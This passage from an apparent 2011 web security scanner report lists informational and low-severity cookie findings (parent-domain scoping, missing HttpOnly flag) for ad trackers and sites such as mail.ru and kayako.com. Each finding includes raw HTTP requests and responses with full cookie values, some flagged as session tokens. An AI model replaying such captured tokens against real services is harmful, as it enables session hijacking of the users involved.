User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: FTID=2jmTRp3gv_ms:1303423661:1301840:aHR0cDovL3d3dy5tYXJrZXRnaWQuY29tLw:aHR0cDovL2J1cnAvc2hvdy8xNA:; Mpopl=357307690; mrcu=22F24DB5832F1F2AA51BF3D6C1AD; b=8DoBAAAJIgMAAQAC

Response

HTTP/1.1 200 OK
Server: nginx/0.8.54
Date: Mon, 25 Apr 2011 14:21:22 GMT
Content-Type: image/jpeg
Content-Length: 3520
Connection: keep-alive
Set-Cookie: p=k+0GAEqHxAAA; expires=Wed, 24-Apr-13 14:21:22 GMT; path=/; domain=.mail.ru
Expires: Mon, 02 May 2011 14:21:22 GMT
Cache-Control: max-age=604800
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID PSAo PSDo OUR BUS UNI NAV STA INT"

......JFIF.....d.d......Ducky.......<.........R.u.s.s.i.a.n. .P.r.e.s.i.d.e.n.t. .D.m.i.t.r.y. .M.e.d.v.e.d.e.v. .i.s. .s.e.e.n. .a.g.a.i.n.s.t. .t.h.e. .b.a.c.k.g.r.o.u.n.d. .o.f. .R.u.s.s.i.a.'.s. .
...[SNIP]...
16.103. http://rbcgaru.hit.gemius.pl/_1303741244306/rexdot.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://rbcgaru.hit.gemius.pl
Path:   /_1303741244306/rexdot.gif

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /_1303741244306/rexdot.gif?l=11&id=dv1K38epj5OVvUz_k_bVXZdS..OUmvCYJk0brLMVk1z.X7&tz=300&href=http%3A//pretty.ru/&ref=&screen=1920x1200&col=16 HTTP/1.1
Host: rbcgaru.hit.gemius.pl
Proxy-Connection: keep-alive
Referer: http://pretty.ru/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: Gtestb=qtHAtEQHt0NRnbMaHgTBB_vxOXZuma22fdxwf2WrWlD.g7; Gtestss=TyHLZcpeZ6QeXgn5D25OXPa7; Gdyn=KlS_MB9GvGQpqwo8SYS8RSpGLl2xMSy8rDOx5Rf1MG88inAs-QFjaGGM8GGaSbY3W5bQsj8GmbsxGs..

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 14:44:55 GMT
Expires: Sun, 24 Apr 2011 14:44:55 GMT
Accept-Ranges: none
Pragma: no-cache
Cache-Control: no-store, no-cache, must-revalidate, max-age=0
Set-Cookie: Gtestss=Fsn.sfn.IWGSprvHhyLhdPi7; Domain=hit.gemius.pl; Path=/; Expires=Tue, 05 Apr 2016 00:00:00 GMT
Set-Cookie: Gtestb=qtHAtEQHt0NRnbMaHgTBB_vxOXZuma22fdxwf2WrWlD.g7; Domain=hit.gemius.pl; Path=/; Expires=Tue, 05 Apr 2016 00:00:00 GMT
Set-Cookie: Gdyn=KlQbwQoGvGQpqwumpBLsoeG2GGGQ8Q7GEMQp-G3AKvMaejey8CDBPMx8REGT7r5vpXJc90jGFyFxGs..; Domain=hit.gemius.pl; Path=/; Expires=Tue, 05 Apr 2016 00:00:00 GMT
P3P: CP="NOI DSP COR NID PSAo OUR IND"
Connection: close
Content-Type: image/gif
Content-Length: 43

GIF89a.............!...
...,...........L..;
16.104. http://rbcgaru.hit.gemius.pl/_1303741312919/rexdot.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://rbcgaru.hit.gemius.pl
Path:   /_1303741312919/rexdot.gif

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /_1303741312919/rexdot.gif?l=11&id=16LgHadxo4kFfevqG4Osi_UTDmyR8tuASw2dzIE9wLz.x7&tz=300&href=http%3A//pda.loveplanet.ru/&ref=http%3A//my.webalta.ru/&screen=1920x1200&col=16 HTTP/1.1
Host: rbcgaru.hit.gemius.pl
Proxy-Connection: keep-alive
Referer: http://pda.loveplanet.ru/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: Gtestss=4YEhxFlgK1uccYJIgsvm8f57; Gtestb=qtHAtEQHt0NRnbMaHgTBB_vxOXZuma22fdxwf2WrWlD.g7; Gdyn=KlGUSB9GvGQpqwumpBLsoeG2GGGQ8Q7GEMQp-G3AKvMaejey8CDBPMx8REQ58k5vpXJc90jGFyFxGs..

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 14:52:49 GMT
Expires: Sun, 24 Apr 2011 14:52:49 GMT
Accept-Ranges: none
Pragma: no-cache
Cache-Control: no-store, no-cache, must-revalidate, max-age=0
Set-Cookie: Gtestss=jWsrZem9.5JcOYXoINPbKvT7; Domain=hit.gemius.pl; Path=/; Expires=Tue, 05 Apr 2016 00:00:00 GMT
Set-Cookie: Gtestb=qtHAtEQHt0NRnbMaHgTBB_vxOXZuma22fdxwf2WrWlD.g7; Domain=hit.gemius.pl; Path=/; Expires=Tue, 05 Apr 2016 00:00:00 GMT
Set-Cookie: Gdyn=KlxStQsGvGQpqwumpBLsoeG2GGGQ8Q7GEMQp-G3AKBDGXjey8CDBPMGGQaQGiag6Kq1W98ASFsjZxnaUMG..; Domain=hit.gemius.pl; Path=/; Expires=Tue, 05 Apr 2016 00:00:00 GMT
P3P: CP="NOI DSP COR NID PSAo OUR IND"
Connection: close
Content-Type: image/gif
Content-Length: 43

GIF89a.............!...
...,...........L..;
16.105. http://segment-pixel.invitemedia.com/pixel  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://segment-pixel.invitemedia.com
Path:   /pixel

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /pixel?pixelID=13893&partnerID=91&clientID=2693&key=segment&returnType=js HTTP/1.1
Host: segment-pixel.invitemedia.com
Proxy-Connection: keep-alive
Referer: http://pixel.fetchback.com/serve/fb/pdc?cat=&name=landing&sid=719
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uid=8218888f-9a83-4760-bd14-33b4666730c0; exchange_uid=eyIyIjogWyIyNzI0Mzg2MDE5MjI3ODQ2MjE4IiwgNzM0MjQ1XSwgIjQiOiBbIkNBRVNFQ0NyZjVYQkMyTExTQ3BjRWRBVjNzVSIsIDczNDI0NF19; partnerUID="eyIxOTkiOiBbIkJERkJGRkMyMzFBMjgyRDZFMjQ0NUI4RTRERTRBMkUwIiwgdHJ1ZV0sICI0OCI6IFsiNjIxMDk0NzA0Nzc4NjMwMDI2ODI4MzM4NDI2NDg1NDcxMjI4NzAiLCB0cnVlXX0="; subID="{}"; impressions="{\"578963\": [1303562003+ \"28aaa692-ea2e-30b9-be12-340089999af0\"+ 3241+ 40652+ 138]+ \"405594\": [1303072666+ \"2eefac09-883b-3f77-a8a9-19e6aac05dc5\"+ 22487+ 106641+ 227]}"; camp_freq_p1="eJzjkuFYMZ9VgFFict/ptywKjBqTmz+8ZTFgtADzuUQ4dt5nBsrOmr8WKMugwWDAYMEAAM06EHg="; io_freq_p1="eJzjEubYFirAKDG57/RbFgNGCzDNJcyx1wUoOGv+2rcsCgwaDAYMFgwAG9QMUw=="; dp_rec="{\"3\": 1303562003+ \"2\": 1303072666}"; segments_p1="eJzjYuE42M3IxcLR9J8JSDaDyc4OZiB56AgTFzPHdGMAkgUIPg=="

Response

HTTP/1.0 200 OK
Server: IM BidManager
Date: Mon, 25 Apr 2011 14:40:42 GMT
P3P: policyref="/w3c/p3p.xml", CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Expires: Mon, 25-Apr-2011 14:40:22 GMT
Content-Type: text/javascript
Pragma: no-cache
Cache-Control: no-cache
Set-Cookie: segments_p1="eJzjYuE42M3IxcLR9J8JSDYDSWaOozlAZmcHM5A8dAQkMN0YAMDqCYQ="; Domain=invitemedia.com; expires=Tue, 24-Apr-2012 14:40:42 GMT; Path=/
Content-Length: 343

makePixelRequest("http://ad.yieldmanager.com/pixel?id=772369&t=2","image");

function makePixelRequest(pixelURL,pixelType){

if(pixelType == "javascript")
{
document.write('<script src
...[SNIP]...
16.106. http://server.iad.liveperson.net/hc/48536788/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://server.iad.liveperson.net
Path:   /hc/48536788/

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /hc/48536788/?&site=48536788&cmd=mTagStartPage&lpCallId=181652786210-472512470558&protV=20&lpjson=1&page=http%3A//www.internetreputationmanagement.com/&id=3689286436&javaSupport=true&visitorStatus=INSITE_STATUS&activePlugin=none&cobrowse=true&PV%21visitorActive=1&title=Online%20Reputation%20Management%20%7C%20Internet%20Reputation%20Management&cookie=SESS66f1c041454c024a385686a578c40a41%3Dogb51ub0vsr90vi4u3afvog295%3B%20has_js%3D1%3B%20__utmz%3D1.1303746799.1.1.utmcsr%3D%28direct%29%7Cutmccn%3D%28direct%29%7Cutmcmd%3D%28none%29%3B%20__utma%3D1.1986090408.1303746799.1303746799.1303746799.1%3B%20__utmc%3D1%3B%20__utmb%3D1.1.10.1303746799 HTTP/1.1
Host: server.iad.liveperson.net
Proxy-Connection: keep-alive
Referer: http://www.internetreputationmanagement.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: HumanClickKEY=7046970874061540351; LivePersonID=LP i=16601209214853,d=1303177644; HumanClickACTIVE=1303746789908

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 15:53:12 GMT
Server: Microsoft-IIS/6.0
P3P: CP="NON BUS INT NAV COM ADM CON CUR IVA IVD OTP PSA PSD TEL SAM"
X-Powered-By: ASP.NET
Set-Cookie: HumanClickSiteContainerID_48536788=STANDALONE; path=/hc/48536788
Set-Cookie: LivePersonID=-16601209214853-1303746790:-1:-1:-1:-1; expires=Tue, 24-Apr-2012 15:53:12 GMT; path=/hc/48536788; domain=.liveperson.net
Content-Type: application/x-javascript
Accept-Ranges: bytes
Last-Modified: Mon, 25 Apr 2011 15:53:12 GMT
Cache-Control: no-store
Pragma: no-cache
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Content-Length: 1998

lpConnLib.Process({"ResultSet": {"lpCallId":"181652786210-472512470558","lpCallConfirm":"","lpJS_Execute":[{"code_id": "SYSTEM!updateButtonStatic_compact.js", "js_code": "function lpUpdateStaticButton
...[SNIP]...
16.107. http://sorry.google.com/sorry/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://sorry.google.com
Path:   /sorry/

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /sorry/?continue=http://www.google.com/search%3Fsourceid%3Dchrome%26ie%3DUTF-8%26q%3Dmalware%2Bvirus HTTP/1.1
Host: sorry.google.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PREF=ID=0772c9d5ef13aaaf:U=e1fa6a1c985d530f:TM=1303071569:LM=1303430315:S=G3Eo9Ou469J3cHp7; NID=46=G6tAQMMliMdgbUozp0g-12zJ4nIr9W3lVB7VLX4tvICbyeI1deRYnF0ETnjMaFRcDOw858z9ldTQARgCwUuLQTXPs03YWNQDMeYsf58qFzWq4-g9gJ1mhwHeRmKdbRzf

Response

HTTP/1.1 503 Service Unavailable
Set-Cookie: S=sorry=WbnEk7itoTuIPssOyKDfZA; path=/; domain=google.com
Date: Mon, 25 Apr 2011 15:52:01 GMT
Pragma: no-cache
Expires: Fri, 01 Jan 1990 00:00:00 GMT
Cache-Control: no-cache, must-revalidate
Content-Type: text/html
Server: GCS/1.0
Content-Length: 2689
X-XSS-Protection: 1; mode=block

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head><meta http-equiv="content-type" content="text/html; charset=utf-8"><title>http://www.google.com/search?sourceid=chrome&amp;
...[SNIP]...
16.108. http://storage.trafic.ro/js/trafic.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://storage.trafic.ro
Path:   /js/trafic.js

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /js/trafic.js HTTP/1.1
Host: storage.trafic.ro
Proxy-Connection: keep-alive
Referer: http://www.marketgid.com/pnews/773204/i/7269/pp/2/1/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 200 OK
Date: Mon, 25 Apr 2011 14:20:47 GMT
Server: Apache
Content-type: application/x-javascript
Expires: Thu, 11 Jan 1973 16:00:00 GMT
Last-Modified: Mon, 25 Apr 2011 14:20:47 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
P3P: policyref="/w3c/p3p.xml", CP="ALL IND DSP COR ADM CONo CUR IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
Set-Cookie: trafic_ranking=6c7f4ecfdd8l1dc980fda3f00c3621d0; expires=Sun, 11-Jan-2037 14:00:00 GMT; path=/; domain=.trafic.ro
Connection: close

t_js_dw_time=new Date().getTime();document.write('<scr' + 'ipt type="text/javascript" src="http://storage.trafic.ro/js/trafic.js?tk='+(Math.pow(10,16) * Math.random())+'&t_rid='+t_rid+'"></sc' + 'ript
...[SNIP]...
16.109. http://top5.mail.ru/counter  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://top5.mail.ru
Path:   /counter

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /counter?id=110605;js=13;r=;j=true;s=1920*1200;d=16;rand=0.07091198652051389 HTTP/1.1
Host: top5.mail.ru
Proxy-Connection: keep-alive
Referer: http://mail.ru/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: FTID=2jmTRp3gv_ms:1303423661:1301840:aHR0cDovL3d3dy5tYXJrZXRnaWQuY29tLw:aHR0cDovL2J1cnAvc2hvdy8xNA:; Mpopl=357307690; mrcu=22F24DB5832F1F2AA51BF3D6C1AD; b=8DoFACDL8gAAdDQMfV4MAQAIEwAIeWwM

Response

HTTP/1.1 200 OK
Server: wz/1.4
Date: Mon, 25 Apr 2011 14:48:03 GMT
Content-Type: image/gif
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CUR PSA OUR NOR"
Set-Cookie: VID=2VWb1Y31X_ms; path=/; expires=Tue, 26 Jul 2011 14:48:03 GMT; domain=.mail.ru
Set-Cookie: FTID=0; path=/; max-age=0; expires=Thu, 01 Jan 1970 00:00:01 GMT; domain=.mail.ru
Cache-control: no-store, no-cache, must-revalidate
Pragma: no-cache
Content-Length: 43
Connection: close

GIF89a.............!.......,...........D..;
16.110. http://www.kayako.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.kayako.com
Path:   /

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET / HTTP/1.1
Host: www.kayako.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 19:40:53 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.3.3
Set-Cookie: km__last_visit=988418453; expires=Tue, 24-Apr-2012 19:40:53 GMT; path=/; domain=.kayako.com
Set-Cookie: km__last_activity=1303778453; expires=Tue, 24-Apr-2012 19:40:53 GMT; path=/; domain=.kayako.com
Set-Cookie: km__tracker=a%3A1%3A%7Bi%3A0%3Bs%3A5%3A%22index%22%3B%7D; path=/; domain=.kayako.com
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 43334


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<title>Help Desk Softwa
...[SNIP]...
16.111. http://www.kayako.com/styles/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.kayako.com
Path:   /styles/

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /styles/ HTTP/1.1
Host: www.kayako.com
Proxy-Connection: keep-alive
Referer: http://www.kayako.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: km__last_visit=988416873; km__last_activity=1303776873; km__tracker=a%3A1%3A%7Bi%3A0%3Bs%3A5%3A%22index%22%3B%7D

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 19:14:33 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.3.3
Set-Cookie: km__last_activity=1303776873; expires=Tue, 24-Apr-2012 19:14:33 GMT; path=/; domain=.kayako.com
Set-Cookie: km__tracker=a%3A2%3A%7Bi%3A0%3Bs%3A8%3A%22%2Fstyles%2F%22%3Bi%3A1%3Bs%3A5%3A%22index%22%3B%7D; path=/; domain=.kayako.com
Set-Cookie: km__tracker=a%3A1%3A%7Bi%3A0%3Bs%3A5%3A%22index%22%3B%7D; path=/; domain=.kayako.com
Vary: Accept-Encoding
Connection: close
Content-Type: text/css
Content-Length: 105618

/* Reset */
html,body,div,span,applet,object,iframe,h1,h2,h3,h4,h5,h6,p, blockquote, pre,a,abbr,acronym,address,big,cite,code,del,dfn,em,font,img,ins,kbd,q,s,samp,small,strike,strong,sub,sup,tt,var,dl
...[SNIP]...
16.112. http://www.kayako.com/styles/graphics/loader.white.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.kayako.com
Path:   /styles/graphics/loader.white.gif

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /styles/graphics/loader.white.gif HTTP/1.1
Host: www.kayako.com
Proxy-Connection: keep-alive
Referer: http://www.kayako.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: km__last_visit=988416873; km__last_activity=1303776873; km__tracker=a%3A1%3A%7Bi%3A0%3Bs%3A5%3A%22index%22%3B%7D; __utmz=243534751.1303758892.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=243534751.649237146.1303758892.1303758892.1303758892.1; __utmc=243534751; __utmb=243534751.1.10.1303758892

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 19:15:14 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.3.3
Set-Cookie: km__last_activity=1303776914; expires=Tue, 24-Apr-2012 19:15:14 GMT; path=/; domain=.kayako.com
Set-Cookie: km__tracker=a%3A0%3A%7B%7D; path=/; domain=.kayako.com
Vary: Accept-Encoding
Connection: close
Content-Type: text/css
Content-Length: 105618

/* Reset */
html,body,div,span,applet,object,iframe,h1,h2,h3,h4,h5,h6,p, blockquote, pre,a,abbr,acronym,address,big,cite,code,del,dfn,em,font,img,ins,kbd,q,s,samp,small,strike,strong,sub,sup,tt,var,dl
...[SNIP]...
16.113. http://www.livejournal.com/tools/endpoints/journalspotlight.bml  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.livejournal.com
Path:   /tools/endpoints/journalspotlight.bml

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /tools/endpoints/journalspotlight.bml?skip=1&limit=&show_userpics=1&user=&_rand=0.36380812083370984 HTTP/1.1
Host: www.livejournal.com
Proxy-Connection: keep-alive
Referer: http://www.livejournal.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=164322722.1303741260.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=164322722.814293328.1303741260.1303741260.1303741260.1; __utmc=164322722; __utmb=164322722.1.10.1303741260

Response

HTTP/1.1 200 OK
Server: GoatProxy 1.0
Date: Mon, 25 Apr 2011 14:35:25 GMT
Content-Type: text/html; charset=utf-8
Connection: close
X-AWS-Id: ws15
Set-Cookie: ljuniq=Xw061catQYuvMxT:1303742123:pgstats0:m0; expires=Friday, 24-Jun-2011 14:35:23 GMT; domain=.livejournal.com; path=/
Cache-Control: private, proxy-revalidate
ETag: "768345d85a0645590662a213040f76ec"
Vary: Accept-Encoding
Content-Language: en
X-Varnish: 774812408
Age: 0
Via: 1.1 varnish
Content-Length: 2875

{"text":"<table width='100%'><tr><td valign='top' rowspan='2' style='padding-right: 5px;'>\n<div class='normal-users'>\n<ul class='nostyle pkg'>\n<li class='spotlight-1 with-userpic'><span class='user
...[SNIP]...
16.114. http://www.tns-counter.ru/V13a***R%3E*vkontakte_ru/ru/UTF-8/tmsec=vkontakte_total/532617388  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.tns-counter.ru
Path:   /V13a***R%3E*vkontakte_ru/ru/UTF-8/tmsec=vkontakte_total/532617388

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /V13a***R%3E*vkontakte_ru/ru/UTF-8/tmsec=vkontakte_total/532617388 HTTP/1.1
Host: www.tns-counter.ru
Proxy-Connection: keep-alive
Referer: http://vkontakte.ru/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 302 Moved Temporarily
Server: tns-counter.0.5.3
Date: Mon, 25 Apr 2011 14:20:23 GMT
Content-Type: image/gif
Content-Length: 43
Location: http://www.tns-counter.ru/V13b***R%3E*vkontakte_ru/ru/UTF-8/tmsec=vkontakte_total/532617388
Connection: close
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0, no-cache=Set-Cookie, max-age=0, proxy-revalidate
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CUR OUR NOR"
Expires: Thu, 01 Jan 1970 00:00:01 GMT
Pragma: no-cache
Set-Cookie: guid=CB6401004DB58327X1303741223; expires=Thu, 31-Dec-37 23:55:55 GMT; domain=.tns-counter.ru; path=/

GIF89a.............!.......,...........L..;
17. Cookie without HttpOnly flag set  previous  next
There are 252 instances of this issue:

17.1. http://173.46.7.45/SightMaxAgentInterface/Monitor.smjs  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://173.46.7.45
Path:   /SightMaxAgentInterface/Monitor.smjs

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /SightMaxAgentInterface/Monitor.smjs?accountID=1&siteID=13&queueID=33&AllQueues=yes&exq35=true&exq36=true&exq44=true&exq45=true HTTP/1.1
Host: 173.46.7.45
Proxy-Connection: keep-alive
Referer: http://hostpapasupport.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: application/x-javascript; charset=utf-8
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
Set-Cookie: SmartMaxUser=3021cd2b-641f-41be-a4cb-2e2b79788a30; expires=Tue, 01-Jan-2036 05:00:00 GMT; path=/
Set-Cookie: SmartMaxSession=a9238763-ff7f-40f2-8b26-2be72129c674; path=/
X-Powered-By: ASP.NET
Date: Mon, 25 Apr 2011 19:44:02 GMT
Content-Length: 102488

/* updated */
(function(E,B){function ka(a,b,d){if(d===B&&a.nodeType===1){d=a.getAttribute("data-"+b);if(typeof d==="string"){try{d=d==="true"?true:d==="false"?false:d==="null"?null:!c.isNaN(d)?parse
...[SNIP]...
17.2. http://ads.adxpose.com/ads/ads.js  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://ads.adxpose.com
Path:   /ads/ads.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ads/ads.js?uid=ZC45X9Axu6NOUFfX_289668 HTTP/1.1
Host: ads.adxpose.com
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-1134822682510879&output=html&h=600&slotname=3061072279&w=160&lmt=1303759227&flash=10.2.154&url=http%3A%2F%2Fgames.webalta.ru%2F&dt=1303741227549&bpp=5&shv=r20110420&jsv=r20110415&correlator=1303741227571&frm=0&adk=1110337129&ga_vid=973557293.1303741228&ga_sid=1303741228&ga_hid=154889240&ga_fc=0&u_tz=-300&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=1125&bih=929&fu=0&ifi=1&dtd=35&xpc=naYdoqC7iz&p=http%3A//games.webalta.ru
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
